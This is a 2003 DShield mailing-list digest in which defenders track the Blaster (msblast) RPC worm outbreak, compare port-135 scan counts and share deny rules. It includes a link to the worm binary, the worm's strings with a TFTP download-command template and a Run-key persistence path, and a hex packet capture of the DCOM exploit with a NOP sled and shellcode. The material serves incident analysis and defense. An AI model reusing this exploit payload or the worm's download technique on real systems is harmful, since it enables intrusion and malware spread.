[Dshield] Re: list Digest, Vol 8, Issue 16

Luke LeCrosse luke646 at yahoo.com
Tue Aug 12 01:11:43 GMT 2003


A friend of mine just got hit with this one >"exploitcontrolrpc" and can neither dcelete or quarantine it. Anyone else see it before and have solution?
 
Thanks,
 
Luke

list-request at dshield.org wrote:
Send list mailing list submissions to
list at dshield.org

To subscribe or unsubscribe via the World Wide Web, visit
http://www.dshield.org/mailman/listinfo/list
or, via email, send a message with subject or body 'help' to
list-request at dshield.org

You can reach the person managing the list at
list-owner at dshield.org

When replying, please edit your Subject line so it is more specific
than "Re: Contents of list digest..."
Today's Topics:

1. Re: infocon: yellow (Johannes Ullrich)
2. RE: massive attack to rpc? (Paul Marsh)
3. RE: infocon: yellow (Synergy)
4. RE: infocon: yellow (Andy Hopkins)
5. Re: RE: [Dshield] infocon: yellow
6. Re: infocon: yellow (Jonathan Rickman)
7. Re: infocon: yellow (Jeff Kell)
8. 
Sorry I know we're all busy but I had to share this with the list.
(Paul Marsh)
9. RE: infocon: yellow (Chris Ream)
10. Re: infocon: yellow
11. Re: Sorry I know we're all busy but I had to share this
with the list. (Jonathan Rickman)
12. ISS is reporting the following (Paul Marsh)
13. Re: infocon: yellow (Blake McNeill)
14. Re: Re: [Dshield] infocon: yellow
15. Re: infocon: yellow (Jonathan Rickman)
16. Re: infocon: yellow
17. RE: infocon: yellow (Chris Ream)
18. RE: infocon: yellow (Chris Ream)
19. Re: infocon: yellow (Blake McNeill)
20. Re: infocon: yellow (Jonathan Rickman)
21. Re: Pacekt payloads to TCP:135, TCP:4444 (John Sage)


> ATTACHMENT part 3.1 message/rfc822 
Date: Mon, 11 Aug 2003 15:58:53 -0400
From: Johannes Ullrich 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <1060631933.11754.250.camel at bart>
In-Reply-To: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
References: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 1

http://johannes.homepc.org/viruszoo/msblast.zip
please let me know what you find.



On Mon, 2003-08-11 at 15:26, Mrcorp wrote:
> any chance of getting the worm in a zip file for further analysis?
> 
> Thank you,
> 
> Charles
> 
> --- "Johannes B. Ullrich" wrote:
> > This message was converted from multipart/signed to ascii armored
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > 
> > Content-Type: text/plain
> > Content-Transfer-Encoding: quoted-printable
> > 
> > We just got a binary that looks very much like an
> > RPC worm. It scans for port 135. No real idea what it does (other than
> > scanning).
> > 
> > Strings from the file:
> > 
> > msblast.exe
> > I just want to say LOVE YOU SAN!!
> > billy gates why do you make this possible ? 
> > Stop making money and fix your software
> > windowsupdate.com
> > 
> > BILLY
> > windows auto update
> > SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> > tftp -i %s GET %s
> > 
> > 
> > 
> > 
> > -- 
> > SANS - Internet Storm Center
> > http://isc.sans.org
> > PGP Key: http://isc.sans.org/jullrich.txt
> > 
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.2.1 (GNU/Linux)
> > 
> > iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
> > FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----
> > 
> > --
> > SHA1
> > _______________________________________________
> > list mailing list
> > list at dshield.org
> > To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> 
> 
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com
> 
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list
-- 
--------------------------------------------------------------
Johannes Ullrich jullrich at euclidian.com
pgp key: http://johannes.homepc.org/PGPKEYS
--------------------------------------------------------------
"We regret to inform you that we do not enable any of the 
security functions within the routers that we install."
support at covad.net
--------------------------------------------------------------




> ATTACHMENT part 3.2 message/rfc822 
Date: Mon, 11 Aug 2003 16:00:40 -0400
From: "Paul Marsh" 

To: "General DShield Discussion List" 

Subject: RE: [Dshield] massive attack to rpc?
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC2 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 2

Shawn:

Just an FYI on the info you just posted to Isaac's question. This thing can hide, I think your better off Fdisk'in and reinstalling. http://isc.sans.org/diary.html?date=2003-08-09

-----Original Message-----
From: Shawn Cox [mailto:shawn.cox at pcca.com]
Sent: Monday, August 11, 2003 3:51 PM
To: General DShield Discussion List
Subject: Re: [Dshield] massive attack to rpc?


Yes. The connection attempt causes the RPC service to crash. In XP the
service is set to reboot the computer 60 seconds later. Remove you affected
machine fromt the network, patch and re-attach to the network.


----- Original Message ----- 
From: "isaac perez" 

To: 

Sent: Monday, August 11, 2003 2:40 PM
Subject: [Dshield] massive attack to rpc?


> Hi,
> I'm new on this list, anyone knows what happens with a problem of rpc that
> makes the system shutdown?
> It seems a massive attack like the old code red, but isnt directed to one
> host, its directed to a large number of host and did by different ips.
> My location its in spain, but i think the "attacker" ips come from
different
> countries, so i suppose it happens the same in "all" the world.
> Thanks, I had reported my logs to dshield.
> And waiting for the notices.....
>
> Sorry for my expressions the english isn't my first language.
>
> _________________________________________________________________
> Dale rienda suelta a tu tiempo libre. Encuentra mil ideas para exprimir tu
> ocio con MSN Entretenimiento. http://entretenimiento.msn.es/
>
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list



> ATTACHMENT part 3.3 message/rfc822 
Date: Mon, 11 Aug 2003 16:02:22 -0400
From: Synergy 
To: General DShield Discussion List 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <5.1.0.14.2.20030811155849.022c6bc8 at pop1.attglobal.net>
In-Reply-To: <460D28F67915D51184E600508BD8A9E3030E0403 at aeteaexch1.aetea.
com>
Content-Type: text/plain; charset="us-ascii"; format=flowed
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 3

At 03:04 PM 8/11/2003, Richard Golodner wrote:
>We are seeing a 10x increase in scans for port 135 begining at 1400 Eastern
>Time.
>Top Four Netblocks
>61.43.222.214
>65.30.70.92
>198.142.176.27
>212.27.213.168

If it's any help -- I've got loggers running on Linksys routers in three 
locations: Comcast in Seattle, Comcast in Kittery Maine, and Cox in 
Providence RI. In each case the great bulk of the 135 scans are from 
machines that are quite nearby in terms of IP addresses, e.g. N.N.N.x or 
N.N.x.x

rgds


--
Synergy - 96 Bolton Ave Suite 2, Providence RI 
02908 USA
401 274-5827, cell: 401 225-5004, fax: 401 274-4944



> ATTACHMENT part 3.4 message/rfc822 
Date: Tue, 12 Aug 2003 08:27:55 +1200
From: Andy Hopkins 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 4

FYI: Its started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow


This message was converted from multipart/signed to ascii armored
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----

--
SHA1
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list


> ATTACHMENT part 3.5 message/rfc822 
Date: Mon, 11 Aug 2003 15:41 -0500
From: haled at longlines.com
To: General DShield Discussion List 

CC: 
Subject: Re: RE: [Dshield] infocon: yellow
Message-ID: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 5

Iowa is getting hammered right now. I have talked to a couple of the offending ISP's and they said that they are getting calls from customers who say that the customer is getting an error that says that they have to reboot. 

Deb 


>FYI: Its started here in NZ at 02:30 local time
>
>------------------------------------------
>Andy Hopkins
>Senior Unix & Firewall Administrator
>healthAlliance
>
>(+64) (9) 486 8944
>(+64) (25) 285 2139
>
>Disclaimer:
>The views and information expressed in this e-Mail are actually mine,
>because my partner says so!
>healthAlliance doesn't necessarily agree with me either
>
>
>
>-----Original Message-----
>From: Johannes B. Ullrich [mailto:jullrich at sans.org]
>Sent: Tuesday, 12 August 2003 06:24
>To: list at dshield.org
>Subject: [Dshield] infocon: yellow
>
>
>This message was converted from multipart/signed to ascii armored
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Content-Type: text/plain
>Content-Transfer-Encoding: quoted-printable
>
>We just got a binary that looks very much like an
>RPC worm. It scans for port 135. No real idea what it does (other than
>scanning).
>
>Strings from the file:
>
>msblast.exe
>I just want to say LOVE YOU SAN!!
>billy gates why do you make this possible ? 
> Stop making money and fix your software
>windowsupdate.com
>
>BILLY
>windows auto update
>SOFTWARE\Microsoft\Windows\CurrentVersion\Run
>tftp -i %s GET %s
>
>
>
>
>-- 
>SANS - Internet Storm Center
>http://isc.sans.org
>PGP Key: http://isc.sans.org/jullrich.txt
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.2.1 (GNU/Linux)
>
>iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
>FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----
>
>--
>SHA1
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see:
>http://www.dshield.org/mailman/listinfo/list
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

-------------------
Email sent using Long Lines Web Mail (http://www.longlines.com/)




> ATTACHMENT part 3.6 message/rfc822 
Date: Mon, 11 Aug 2003 16:47:00 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111647.00023.jonathan at xcorps.net>
In-Reply-To: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
References: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 6

On Monday 11 August 2003 16:27, Andy Hopkins wrote:
> FYI: Its started here in NZ at 02:30 local time

Got a flurry of them here at 15:43 EST but it promptly ceased at 16:20 EST. 
Waiting for confirmation that it has been blocked upstream. 

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.7 message/rfc822 
Date: Mon, 11 Aug 2003 16:49:54 -0400
From: Jeff Kell 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <3F380172.6050807 at utc.edu>
In-Reply-To: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
References: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 7

haled at longlines.com wrote:

> Iowa is getting hammered right now. I have talked to a couple of the
> offending ISP's and they said that they are getting calls from
> customers who say that the customer is getting an error that says
> that they have to reboot.


On one of our ISPs:
deny tcp any any range 135 139 (223189 matches)
deny udp any any range 135 netbios-ss (105897 matches)
deny udp any any eq 445
deny tcp any any eq 445 (74579 matches)

On another:
deny tcp any any range 135 139 (147934 matches)
deny udp any any range 135 netbios-ss (103334 matches)
deny udp any any eq 445
deny tcp any any eq 445 (56901 matches)

This data is a little over 14 hours accumulated time.

Jeff



> ATTACHMENT part 3.8 message/rfc822 
Date: Mon, 11 Aug 2003 16:50:10 -0400
From: "Paul Marsh" 

To: "'Dshield (E-mail)" 

Subject: [Dshield] 
Sorry I know we're all busy but I had to share this with the list.
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 8

The following are just a few posts I just received on FD, it's amazing, isn't anyone paying attention?

#1.

We're seeing what looks like an rpc worm spreading internally (gotta love
dialup users), and I'm trying to figure out if this is something new, or
just something old that we finally are getting.

I'm not entirely sure it's a worm, it almost appears to be an auto-rooter
with quick spreading ability (fine line between that and a worm, I
suppose). Has anybody else seen something with these characteristics:

Host scans local subnet first, looking for vulnerable machines and opening
up port 4444 on the remote host, and running the following:

#2.

I'm working as a technician and have had 3 people
from the local area call within the last hour about a
problem with having their computer shut down after
giving a one minute warning. This only happens when
they have an internet connection - if they boot up
with a network cable plugged in, even if they don't
have a browser or any other apps open, it'll shut
down. It looks like they're all running NT/2k/XP as
well - is this a DCOM worm? 

#3.

I had two friends of mine call me, telling that
their PC would "constantly reboot" complaining
about some "RPC" thing. Both calls within an
hour. Something tells me it might have to do
with that worm...



> ATTACHMENT part 3.9 message/rfc822 
Date: Mon, 11 Aug 2003 15:01:05 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
In-Reply-To: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 9

Has anyone captured the packet stream? I've got some sensors listening
but have not yet seen it. I would like to reconstruct it and disassemble
it to find out exactly what it's doing.

If anyone has captured it and is willing to share it I would greatly
appreciate it.

Chris Ream
Synaptek Network Security.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Andy Hopkins
Sent: Monday, August 11, 2003 2:28 PM
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow

FYI: Its started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow


This message was converted from multipart/signed to ascii armored
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----

--
SHA1
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list



> ATTACHMENT part 3.10 message/rfc822 
Date: Mon, 11 Aug 2003 17:01:42 -0400
From: Phil.Rodrigues at uconn.edu
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: 
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 10

This is our number of dropped TCP 135 requests since noon today, per 30 
mins:

57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================





Jonathan Rickman 
Sent by: list-bounces at dshield.org
08/11/2003 04:47 PM
Please respond to General DShield Discussion List


To: General DShield Discussion List 

cc: 
Subject: Re: [Dshield] infocon: yellow


On Monday 11 August 2003 16:27, Andy Hopkins wrote:
> FYI: Its started here in NZ at 02:30 local time

Got a flurry of them here at 15:43 EST but it promptly ceased at 16:20 
EST. 
Waiting for confirmation that it has been blocked upstream. 

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net


_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list





> ATTACHMENT part 3.11 message/rfc822 
Date: Mon, 11 Aug 2003 17:03:06 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] Sorry I know we're all busy but I had to share this
with the list.
Message-ID: <200308111703.06480.jonathan at xcorps.net>
In-Reply-To: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
References: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 11

On Monday 11 August 2003 16:50, Paul Marsh wrote:
> The following are just a few posts I just received on FD, it's amazing,
> isn't anyone paying attention?

Obviously not, as I am now logging over 300 attempts per minute on one 
single host, most coming from the same class B. Interestingly enough, only 
2 repeats so far. You do the math. 

It stopped for a bit. I thought the upstream had started blocking it, but 
apparently I was wrong.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.12 message/rfc822 
Date: Mon, 11 Aug 2003 17:08:46 -0400
From: "Paul Marsh" 

To: "'Dshield (E-mail)" 

Subject: [Dshield] ISS is reporting the following
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC6 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 12

https://gtoc.iss.net/issEn/delivery/gtoc/index.jsp



> ATTACHMENT part 3.13 message/rfc822 
Date: Mon, 11 Aug 2003 15:22:37 -0600
From: Blake McNeill 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <012501c3604e$b08270c0$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
Content-Type: text/plain; charset=iso-8859-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT
Precedence: list
Reply-to: General DShield Discussion List 

Message: 13

This is a capture from last night, but now we are seeing lots of them. One
person told me that this is the xFocus/Metaploit scan, but we have not see
it with the second part until this morning, but we had seen lots of
xFocus/Metaploit scans before ( http://www.linklogger.com/RPC_DCOM.htm ), so
I have some doubts about their analysis and perhaps this is the worm.

Blake
http://www.SonicLogger.com - Logging Software for SonicWall and 3Com
http://www.LinkLogger.com - Logging Software for Linksys, Netgear and Zyxel


TCP Connection Request
--- 8/10/03 18:38:27.580

65.33.159.235 : 1040 TCP Connected ID = 6
--- 8/10/03 18:38:27.690
Status Code: 0 OK

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.390
0000 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 ........H......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
0020 A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
0040 2B 10 48 60 02 00 00 00 +.H`....

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.720
0000 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
0010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
0020 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
0030 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
0040 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
0050 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
0060 AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
0070 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
0080 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
0090 A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
00A0 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
00B0 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
00C0 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
00D0 E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
00E0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00F0 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
0100 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
0110 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0120 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0130 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0140 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0150 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0160 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
0170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
0180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 .... at ... ...8...
0190 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
01A0 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01F0 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
0200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
0210 C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
0220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
0230 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
0240 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
0250 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
0280 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
0290 C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
02A0 C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
02B0 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
02C0 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
02D0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
02E0 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
02F0 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
0300 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
0310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
0320 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
0350 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
0360 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
0370 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
0380 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
0390 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0440 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
0450 FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
0460 EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
0470 BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
0480 F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
0490 B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
04A0 EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
04B0 BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
04C0 BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
04D0 BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
04E0 BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
04F0 BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
0500 BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
0510 BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
0520 BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
0530 BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
0540 A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
0550 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
0560 D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
0570 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
0580 AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
